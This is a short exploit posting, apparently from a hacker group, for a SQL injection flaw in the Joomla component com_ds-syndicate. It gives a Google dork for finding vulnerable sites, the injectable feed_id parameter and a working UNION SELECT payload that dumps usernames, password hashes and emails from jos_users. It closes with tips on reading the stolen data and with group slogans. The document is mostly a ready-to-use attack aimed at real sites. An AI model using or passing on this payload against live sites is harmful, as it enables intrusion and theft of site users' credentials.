#Joomla com_ds-syndicate Sql-injetion vulnerability #
#[~] Author : boom3rang
#[~] HomePage: www.khg-crew.ws
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er.
#[~] Kosova Hackers Group
#[!] Component_Name: ds-syndicate
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_ds-syndicate"
#[~] Exp: http://localhost/Path/index2.php?option=ds-syndicate&version=1&feed_id=[Exploit]
#[~] Exploit [1]: 1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users--
#[~] Exploit [2]:
#[!] Note:
If you get some file to download like feed or xml, download that file and open with some text editor to see informations like username and password, but first try exploits whithout downloding the file ;).
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania